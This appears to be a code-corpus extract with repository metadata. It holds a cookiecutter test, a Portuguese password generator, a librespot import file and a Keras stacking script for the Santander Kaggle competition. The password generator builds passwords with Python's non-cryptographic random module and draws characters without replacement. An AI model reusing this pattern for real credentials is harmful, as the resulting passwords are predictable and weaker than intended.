] | 22 | 2021-01-15T19:05:54.000Z | 2022-03-26T06:21:27.000Z | {{cookiecutter.project_slug}}/python/tests/test_python_bindings.py | Wellidontcare/cookiecutter-cpp-project | 09988b1933b7695dfaac48b68b4060655b1b233a | [
"MIT"
] | 36 | 2020-12-09T13:26:33.000Z | 2022-03-08T10:08:17.000Z | {{cookiecutter.project_slug}}/python/tests/test_python_bindings.py | Wellidontcare/cookiecutter-cpp-project | 09988b1933b7695dfaac48b68b4060655b1b233a | [
"MIT"
] | 5 | 2021-11-08T22:50:06.000Z | 2022-03-06T23:55:17.000Z | import {{ cookiecutter.project_slug.replace("-", "") }}
def test_{{ cookiecutter.project_slug.replace("-", "_") }}():
assert {{ cookiecutter.project_slug.replace("-", "") }}.add_one(1) == 2
| 32.666667 | 75 | 0.627551 | 20 | 196 | 5.85 | 0.6 | 0.487179 | 0.589744 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011561 | 0.117347 | 196 | 5 | 76 | 39.2 | 0.66474 | 0 | 0 | 0 | 0 | 0 | 0.020408 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0 | null | null | 0 | 0.333333 | null | null | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
e37d9136cdfd3482ac9902ca959c58daffc5b382 | 7,756 | py | Python | oldVersions/testPassGen(BetaTest).py | Pharaoh00/Pharaoh-Toolkit | 19692e4cf9a6b5ca9800526da8e6a85b5639290d | [
"MIT"
] | null | null | null | oldVersions/testPassGen(BetaTest).py | Pharaoh00/Pharaoh-Toolkit | 19692e4cf9a6b5ca9800526da8e6a85b5639290d | [
"MIT"
] | null | null | null | oldVersions/testPassGen(BetaTest).py | Pharaoh00/Pharaoh-Toolkit | 19692e4cf9a6b5ca9800526da8e6a85b5639290d | [
"MIT"
] | null | null | null | import random, string
import sys
def PassCustom(a, b, c, d, length=None):
    """Print a random password built from up to four character-class slots.

    Each of ``a``..``d`` selects a character pool: the keywords ``'numero'``,
    ``'upper'``, ``'lower'`` and ``'espec'`` map to digits, uppercase letters,
    lowercase letters and punctuation respectively; any other non-empty string
    is used literally as extra characters, and ``''`` skips the slot.

    This replaces the original 15-branch copy-paste over every combination of
    empty/non-empty slots with a single keyword table, and fixes the
    inconsistency where two branches tested ``'numeros'`` instead of
    ``'numero'`` (silently treating the keyword as literal characters).

    Parameters
    ----------
    a, b, c, d : str
        Slot keywords (or literal characters) as described above.
    length : int or str, optional
        Number of characters to draw.  Defaults to the module-level
        ``passGen`` value read from user input, preserving the original
        call-site behaviour.

    Returns
    -------
    bool or None
        ``True`` on success; ``None`` when the input was invalid (an error
        message is printed instead of raising).
    """
    charsets = {
        "numero": string.digits,
        "upper": string.ascii_uppercase,
        "lower": string.ascii_lowercase,
        "espec": string.punctuation,
    }
    try:
        # Concatenate the pools of every non-empty slot, in slot order
        # (matches the original a + b + c + d concatenation order).
        letter_store = "".join(
            charsets.get(slot, slot) for slot in (a, b, c, d) if slot != ""
        )
        if length is None:
            length = passGen  # original behaviour: module-level user input
        # random.sample draws without replacement, so it raises ValueError
        # when the pool has fewer characters than the requested length —
        # the same error path the original relied on.
        print("".join(random.sample(letter_store, int(length))))
        return True
    except ValueError:
        print("Provavelmente não tem tantos characteres quanto o tamanho final do valor.\nPor favor, adicione mais characteres ou tente um valor menor!")
    except TypeError:
        print("Você tem que passar algum argumento")
# Interactive entry point: ask for the desired password length, then gather
# the four character-class slots and delegate to PassCustom.
passGen = input("Quantos caracteres você deseja ter?: ")
if passGen.isdigit():
    PassCustom(input("Slot 1: "), input("Slot 2: "), input("Slot 3: "), input("Slot 4: "))
else:
    print("Somente numeros")
| 24.466877 | 147 | 0.579938 | 1,100 | 7,756 | 4.036364 | 0.074545 | 0.143694 | 0.091441 | 0.143694 | 0.860586 | 0.855856 | 0.847072 | 0.847072 | 0.847072 | 0.847072 | 0 | 0.000718 | 0.282104 | 7,756 | 316 | 148 | 24.544304 | 0.796695 | 0.039453 | 0 | 0.833333 | 0 | 0.003623 | 0.116445 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003623 | false | 0.021739 | 0.007246 | 0 | 0.014493 | 0.014493 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e380e35787b1544e495b714b5bd6fbf96a653a26 | 141 | py | Python | librespot/player/codecs/__init__.py | JeffmeisterJ/librespot-python | 0e0e1db65aa40262bd13479b97f81ae8c29ae049 | [
"Apache-2.0"
] | null | null | null | librespot/player/codecs/__init__.py | JeffmeisterJ/librespot-python | 0e0e1db65aa40262bd13479b97f81ae8c29ae049 | [
"Apache-2.0"
] | null | null | null | librespot/player/codecs/__init__.py | JeffmeisterJ/librespot-python | 0e0e1db65aa40262bd13479b97f81ae8c29ae049 | [
"Apache-2.0"
] | null | null | null | from librespot.player.codecs.AudioQuality import AudioFile
from librespot.player.codecs.VorbisOnlyAudioQuality import VorbisOnlyAudioQuality
| 47 | 81 | 0.900709 | 14 | 141 | 9.071429 | 0.571429 | 0.204724 | 0.299213 | 0.393701 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056738 | 141 | 2 | 82 | 70.5 | 0.954887 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
8b54a8016d387484377deec020f45963b0cfbd16 | 44,877 | py | Python | stackingGithub/examples/Santander/scripts/ikki_NN_1.py | corworldstarn/stacking | 6102e88d015c0247cdcba2ea9bb951dbe360fc96 | [
"MIT"
] | 204 | 2016-06-03T03:38:26.000Z | 2022-03-17T13:04:04.000Z | stackingGithub/examples/Santander/scripts/ikki_NN_1.py | corworldstarn/stacking | 6102e88d015c0247cdcba2ea9bb951dbe360fc96 | [
"MIT"
] | 41 | 2016-07-16T04:52:21.000Z | 2018-09-26T05:03:16.000Z | stackingGithub/examples/Santander/scripts/ikki_NN_1.py | corworldstarn/stacking | 6102e88d015c0247cdcba2ea9bb951dbe360fc96 | [
"MIT"
] | 76 | 2017-02-08T14:22:20.000Z | 2022-02-03T02:06:42.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#Genaral packages
import os, sys
import pandas as pd
import numpy as np
sys.path.append(os.getcwd())
#os.chdir('/Users/IkkiTanaka/Documents/kaggle/Santander/')
#各種PATH
from stacking.base import FOLDER_NAME, PATH, INPUT_PATH, OUTPUT_PATH, ORIGINAL_TRAIN_FORMAT, SUBMIT_FORMAT
np.random.seed(407)
#keras
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation
from keras.optimizers import SGD
from keras.utils import np_utils
from keras.layers.advanced_activations import LeakyReLU, PReLU
from keras.layers.normalization import BatchNormalization
from keras.regularizers import l1, l2, l1l2, activity_l2
#base_ver2 utils
from stacking.base import load_data, save_pred_as_submit_format, create_cv_id
#classifiers
from stacking.base import BaseModel, XGBClassifier, KerasClassifier
########### First stage ###########
# FEATURE LISTS in Stage 1.
# Train/test feature CSVs for the first stacking stage; the target column is
# expected inside the 'train' files.
FEATURE_LIST_stage1 = {
    'train':('data/output/features/ikki_features_train_NN_ver3.csv',
             'data/output/features/ikki_one_hot_encoder_train_ver3.csv',
            ),#target is in 'train'
    'test':('data/output/features/ikki_features_test_NN_ver3.csv',
            'data/output/features/ikki_one_hot_encoder_test_ver3.csv',
           ),
}
# Load the data once only to record the input width for the networks below,
# then free the memory again.
X,y,test = load_data(flist=FEATURE_LIST_stage1, drop_duplicates=True)
# NOTE(review): `in` and `==` chain here, so this evaluates as
# `(False in X.columns) and (X.columns == test.columns)`, which is likely
# always falsy — making the assert vacuous.  The intended check is probably
# `(X.columns == test.columns).all()`; confirm before changing.
assert((False in X.columns == test.columns) == False)
nn_input_dim_NN = X.shape[1]  # input-layer width shared by every ModelV* below
del X, y, test
# Models in Stage 1
# Training options for ModelV1: batch 256, 35 epochs; inputs normalized and
# targets one-hot encoded (consumed as KerasClassifier kwargs via self.params).
PARAMS_V1 = {
    'batch_size':256,
    'nb_epoch':35,
    'verbose':1,
    'callbacks':[],
    'validation_split':0.,
    'validation_data':None,
    'shuffle':True,
    'show_accuracy':True,
    'class_weight':None,#{0:0.0396, 1:0.9604},
    'sample_weight':None,
    'normalize':True,
    'categorize_y':True
}
class ModelV1(BaseModel):
    def build_model(self):
        """Stage-1 MLP: 120-280-100 hidden units (uniform init, LeakyReLU +
        BatchNorm on the first two layers), SGD lr=0.015; returns a
        KerasClassifier wrapping the compiled net."""
        model = Sequential()
        model.add(Dropout(0.2, input_shape=(nn_input_dim_NN,)))
        model.add(Dense(input_dim=nn_input_dim_NN, output_dim=120, init='uniform'))
        model.add(LeakyReLU(alpha=.00001))
        model.add(BatchNormalization())
        model.add(Dropout(0.5))
        model.add(Dense(input_dim=120,output_dim=280, init='uniform'))
        model.add(LeakyReLU(alpha=.00001))
        model.add(BatchNormalization())
        model.add(Dropout(0.5))
        model.add(Dense(input_dim=280,output_dim=100, init='uniform', activation='relu'))
        model.add(BatchNormalization())
        model.add(Dropout(0.4))
        model.add(Dense(input_dim=100,output_dim=2, init='uniform', activation='softmax'))
        #model.add(Activation('softmax'))
        sgd = SGD(lr=0.015, decay=1e-6, momentum=0.9, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
        return KerasClassifier(nn=model,**self.params)
# Training options for ModelV2: batch 512, 70 epochs; inputs normalized and
# targets one-hot encoded.
PARAMS_V2 = {
    'batch_size':512,
    'nb_epoch':70,
    'verbose':1,
    'callbacks':[],
    'validation_split':0.,
    'validation_data':None,
    'shuffle':True,
    'show_accuracy':True,
    'class_weight':None,#{0:0.0396, 1:0.9604},
    'sample_weight':None,
    'normalize':True,
    'categorize_y':True
}
class ModelV2(BaseModel):
    def build_model(self):
        """Stage-1 MLP: 112-128-68 hidden units (he_normal init, LeakyReLU +
        BatchNorm), SGD lr=0.01 momentum=0.99; returns a KerasClassifier."""
        model = Sequential()
        model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
        model.add(Dense(input_dim=nn_input_dim_NN, output_dim=112, init='he_normal'))
        model.add(LeakyReLU(alpha=.00001))
        model.add(BatchNormalization())
        model.add(Dropout(0.5))
        model.add(Dense(input_dim=112,output_dim=128, init='he_normal'))
        model.add(LeakyReLU(alpha=.00001))
        model.add(BatchNormalization())
        model.add(Dropout(0.5))
        model.add(Dense(input_dim=128,output_dim=68, init='he_normal'))
        model.add(LeakyReLU(alpha=.00003))
        model.add(BatchNormalization())
        model.add(Dropout(0.3))
        model.add(Dense(input_dim=68,output_dim=2, init='he_normal'))
        model.add(Activation('softmax'))
        sgd = SGD(lr=0.01, decay=1e-10, momentum=0.99, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
        return KerasClassifier(nn=model,**self.params)
# Training options for ModelV3: batch 128, 72 epochs; inputs normalized and
# targets one-hot encoded.
PARAMS_V3 = {
    'batch_size':128,
    'nb_epoch':72,
    'verbose':1,
    'callbacks':[],
    'validation_split':0.,
    'validation_data':None,
    'shuffle':True,
    'show_accuracy':True,
    'class_weight':None,#{0:0.0396, 1:0.9604},
    'sample_weight':None,
    'normalize':True,
    'categorize_y':True
}
class ModelV3(BaseModel):
    def build_model(self):
        """Stage-1 MLP: 310-252-128 hidden units (he_normal init, mixed
        LeakyReLU/PReLU + BatchNorm), SGD lr=0.02; returns a KerasClassifier."""
        model = Sequential()
        model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
        model.add(Dense(input_dim=nn_input_dim_NN, output_dim=310, init='he_normal'))
        model.add(LeakyReLU(alpha=.001))
        model.add(BatchNormalization())
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=310,output_dim=252, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.5))
        model.add(Dense(input_dim=252,output_dim=128, init='he_normal'))
        model.add(LeakyReLU(alpha=.001))
        model.add(BatchNormalization())
        model.add(Dropout(0.4))
        model.add(Dense(input_dim=128,output_dim=2, init='he_normal', activation='softmax'))
        #model.add(Activation('softmax'))
        sgd = SGD(lr=0.02, decay=1e-6, momentum=0.9, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
        return KerasClassifier(nn=model,**self.params)
# Training options for ModelV4: batch 128, 56 epochs; inputs normalized and
# targets one-hot encoded.
PARAMS_V4 = {
    'batch_size':128,
    'nb_epoch':56,
    'verbose':1,
    'callbacks':[],
    'validation_split':0.,
    'validation_data':None,
    'shuffle':True,
    'show_accuracy':True,
    'class_weight':None,#{0:0.0396, 1:0.9604},
    'sample_weight':None,
    'normalize':True,
    'categorize_y':True
}
class ModelV4(BaseModel):
    def build_model(self):
        """Stage-1 MLP: 62-158-20 hidden units (he_normal init, no BatchNorm),
        SGD lr=0.05; returns a KerasClassifier."""
        model = Sequential()
        model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
        model.add(Dense(input_dim=nn_input_dim_NN, output_dim=62, init='he_normal'))
        model.add(LeakyReLU(alpha=.001))
        model.add(Dropout(0.3))
        model.add(Dense(input_dim=62,output_dim=158, init='he_normal'))
        model.add(LeakyReLU(alpha=.001))
        model.add(Dropout(0.25))
        model.add(Dense(input_dim=158,output_dim=20, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
        #model.add(Activation('softmax'))
        sgd = SGD(lr=0.05, decay=1e-6, momentum=0.9, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
        return KerasClassifier(nn=model,**self.params)
# Training options for ModelV5: batch 216, 90 epochs; inputs normalized and
# targets one-hot encoded.
PARAMS_V5 = {
    'batch_size':216,
    'nb_epoch':90,
    'verbose':1,
    'callbacks':[],
    'validation_split':0.,
    'validation_data':None,
    'shuffle':True,
    'show_accuracy':True,
    'class_weight':None,#{0:0.0396, 1:0.9604},
    'sample_weight':None,
    'normalize':True,
    'categorize_y':True
}
class ModelV5(BaseModel):
    def build_model(self):
        """Stage-1 MLP: 100-380-50-20 hidden units (he_normal init, PReLU,
        no BatchNorm), SGD lr=0.01; returns a KerasClassifier."""
        model = Sequential()
        model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
        model.add(Dense(input_dim=nn_input_dim_NN, output_dim=100, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=100,output_dim=380, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=380,output_dim=50, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=50,output_dim=20, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
        sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
        return KerasClassifier(nn=model,**self.params)
# Training options for ModelV6: batch 216, 72 epochs; inputs normalized and
# targets one-hot encoded.
PARAMS_V6 = {
    'batch_size':216,
    'nb_epoch':72,
    'verbose':1,
    'callbacks':[],
    'validation_split':0.,
    'validation_data':None,
    'shuffle':True,
    'show_accuracy':True,
    'class_weight':None,#{0:0.0396, 1:0.9604},
    'sample_weight':None,
    'normalize':True,
    'categorize_y':True
}
class ModelV6(BaseModel):
    def build_model(self):
        """Stage-1 MLP: 105-280-60-20 hidden units (he_normal init, PReLU +
        BatchNorm), SGD lr=0.01 momentum=0.99; returns a KerasClassifier."""
        model = Sequential()
        model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
        model.add(Dense(input_dim=nn_input_dim_NN, output_dim=105, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=105,output_dim=280, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=280,output_dim=60, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=60,output_dim=20, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
        sgd = SGD(lr=0.01, decay=1e-10, momentum=0.99, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
        return KerasClassifier(nn=model,**self.params)
# Training options for ModelV7: batch 128, 65 epochs; inputs normalized and
# targets one-hot encoded.
PARAMS_V7 = {
    'batch_size':128,
    'nb_epoch':65,
    'verbose':1,
    'callbacks':[],
    'validation_split':0.,
    'validation_data':None,
    'shuffle':True,
    'show_accuracy':True,
    'class_weight':None,#{0:0.0396, 1:0.9604},
    'sample_weight':None,
    'normalize':True,
    'categorize_y':True
}
class ModelV7(BaseModel):
    def build_model(self):
        """Stage-1 MLP: 100-180-50-30 hidden units (he_normal init, PReLU +
        BatchNorm), SGD lr=0.01; returns a KerasClassifier."""
        model = Sequential()
        model.add(Dropout(0.2, input_shape=(nn_input_dim_NN,)))
        model.add(Dense(input_dim=nn_input_dim_NN, output_dim=100, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=100,output_dim=180, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=180,output_dim=50, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.5))
        model.add(Dense(input_dim=50,output_dim=30, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=30,output_dim=2, init='he_normal', activation='softmax'))
        sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
        return KerasClassifier(nn=model,**self.params)
# Training options for ModelV8: batch 216, 89 epochs; inputs normalized and
# targets one-hot encoded.
PARAMS_V8 = {
    'batch_size':216,
    'nb_epoch':89,
    'verbose':1,
    'callbacks':[],
    'validation_split':0.,
    'validation_data':None,
    'shuffle':True,
    'show_accuracy':True,
    'class_weight':None,#{0:0.0396, 1:0.9604},
    'sample_weight':None,
    'normalize':True,
    'categorize_y':True
}
class ModelV8(BaseModel):
    def build_model(self):
        """Stage-1 MLP: 140-250-90 hidden units (uniform init, LeakyReLU +
        BatchNorm), SGD lr=0.013; returns a KerasClassifier."""
        model = Sequential()
        model.add(Dropout(0.2, input_shape=(nn_input_dim_NN,)))
        model.add(Dense(input_dim=nn_input_dim_NN, output_dim=140, init='uniform'))
        model.add(LeakyReLU(alpha=.00001))
        model.add(BatchNormalization())
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=140,output_dim=250, init='uniform'))
        model.add(LeakyReLU(alpha=.00001))
        model.add(BatchNormalization())
        model.add(Dropout(0.5))
        model.add(Dense(input_dim=250,output_dim=90, init='uniform', activation='relu'))
        model.add(BatchNormalization())
        model.add(Dropout(0.4))
        model.add(Dense(input_dim=90,output_dim=2, init='uniform', activation='softmax'))
        #model.add(Activation('softmax'))
        sgd = SGD(lr=0.013, decay=1e-6, momentum=0.9, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
        return KerasClassifier(nn=model,**self.params)
# Training options for ModelV9: batch 512, 90 epochs; inputs normalized and
# targets one-hot encoded.
PARAMS_V9 = {
    'batch_size':512,
    'nb_epoch':90,
    'verbose':1,
    'callbacks':[],
    'validation_split':0.,
    'validation_data':None,
    'shuffle':True,
    'show_accuracy':True,
    'class_weight':None,#{0:0.0396, 1:0.9604},
    'sample_weight':None,
    'normalize':True,
    'categorize_y':True
}
class ModelV9(BaseModel):
    def build_model(self):
        """Stage-1 MLP: 100-380-50-20 hidden units (he_normal init, PReLU +
        BatchNorm; same topology as ModelV5 plus BatchNorm), SGD lr=0.01;
        returns a KerasClassifier."""
        model = Sequential()
        model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
        model.add(Dense(input_dim=nn_input_dim_NN, output_dim=100, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=100,output_dim=380, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=380,output_dim=50, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=50,output_dim=20, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
        sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
        return KerasClassifier(nn=model,**self.params)
# Training options for ModelV10: batch 216, 80 epochs; inputs normalized and
# targets one-hot encoded.
PARAMS_V10 = {
    'batch_size':216,
    'nb_epoch':80,
    'verbose':1,
    'callbacks':[],
    'validation_split':0.,
    'validation_data':None,
    'shuffle':True,
    'show_accuracy':True,
    'class_weight':None,#{0:0.0396, 1:0.9604},
    'sample_weight':None,
    'normalize':True,
    'categorize_y':True
}
class ModelV10(BaseModel):
    def build_model(self):
        """Stage-1 MLP: 100-360-50-20 hidden units (he_normal init, PReLU +
        BatchNorm), SGD lr=0.01; returns a KerasClassifier."""
        model = Sequential()
        model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
        model.add(Dense(input_dim=nn_input_dim_NN, output_dim=100, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=100,output_dim=360, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=360,output_dim=50, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=50,output_dim=20, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
        sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
        return KerasClassifier(nn=model,**self.params)
# Training options for ModelV11: batch 384, 80 epochs; inputs normalized and
# targets one-hot encoded.
PARAMS_V11 = {
    'batch_size':384,
    'nb_epoch':80,
    'verbose':1,
    'callbacks':[],
    'validation_split':0.,
    'validation_data':None,
    'shuffle':True,
    'show_accuracy':True,
    'class_weight':None,#{0:0.0396, 1:0.9604},
    'sample_weight':None,
    'normalize':True,
    'categorize_y':True
}
class ModelV11(BaseModel):
    def build_model(self):
        """Stage-1 MLP: 110-350-50-20 hidden units (he_normal init, PReLU +
        BatchNorm), SGD lr=0.01; returns a KerasClassifier."""
        model = Sequential()
        model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
        model.add(Dense(input_dim=nn_input_dim_NN, output_dim=110, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=110,output_dim=350, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=350,output_dim=50, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=50,output_dim=20, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
        sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
        return KerasClassifier(nn=model,**self.params)
# Training options for ModelV12: batch 216, 82 epochs; inputs normalized and
# targets one-hot encoded.
PARAMS_V12 = {
    'batch_size':216,
    'nb_epoch':82,
    'verbose':1,
    'callbacks':[],
    'validation_split':0.,
    'validation_data':None,
    'shuffle':True,
    'show_accuracy':True,
    'class_weight':None,#{0:0.0396, 1:0.9604},
    'sample_weight':None,
    'normalize':True,
    'categorize_y':True
}
class ModelV12(BaseModel):
    def build_model(self):
        """Stage-1 MLP: 110-300-60-20 hidden units (he_normal init, PReLU +
        BatchNorm), SGD lr=0.01; returns a KerasClassifier."""
        model = Sequential()
        model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
        model.add(Dense(input_dim=nn_input_dim_NN, output_dim=110, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.3))
        model.add(Dense(input_dim=110,output_dim=300, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.5))
        model.add(Dense(input_dim=300,output_dim=60, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=60,output_dim=20, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
        sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
        return KerasClassifier(nn=model,**self.params)
# Training options for ModelV13: batch 512, 90 epochs; inputs normalized and
# targets one-hot encoded.
PARAMS_V13 = {
    'batch_size':512,
    'nb_epoch':90,
    'verbose':1,
    'callbacks':[],
    'validation_split':0.,
    'validation_data':None,
    'shuffle':True,
    'show_accuracy':True,
    'class_weight':None,#{0:0.0396, 1:0.9604},
    'sample_weight':None,
    'normalize':True,
    'categorize_y':True
}
class ModelV13(BaseModel):
    def build_model(self):
        """Stage-1 MLP: 100-300-50-20 hidden units (he_normal init, PReLU,
        no BatchNorm), SGD lr=0.01; returns a KerasClassifier."""
        model = Sequential()
        model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
        model.add(Dense(input_dim=nn_input_dim_NN, output_dim=100, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(Dropout(0.1))
        model.add(Dense(input_dim=100,output_dim=300, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=300,output_dim=50, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=50,output_dim=20, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
        sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
        return KerasClassifier(nn=model,**self.params)
# Training options for ModelV14: batch 216, 72 epochs; inputs normalized and
# targets one-hot encoded.
PARAMS_V14 = {
    'batch_size':216,
    'nb_epoch':72,
    'verbose':1,
    'callbacks':[],
    'validation_split':0.,
    'validation_data':None,
    'shuffle':True,
    'show_accuracy':True,
    'class_weight':None,#{0:0.0396, 1:0.9604},
    'sample_weight':None,
    'normalize':True,
    'categorize_y':True
}
class ModelV14(BaseModel):
    def build_model(self):
        """Stage-1 MLP: 105-200-60-20 hidden units (he_normal init, PReLU +
        BatchNorm), SGD lr=0.01 momentum=0.99; returns a KerasClassifier."""
        model = Sequential()
        model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
        model.add(Dense(input_dim=nn_input_dim_NN, output_dim=105, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=105,output_dim=200, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=200,output_dim=60, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.5))
        model.add(Dense(input_dim=60,output_dim=20, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.1))
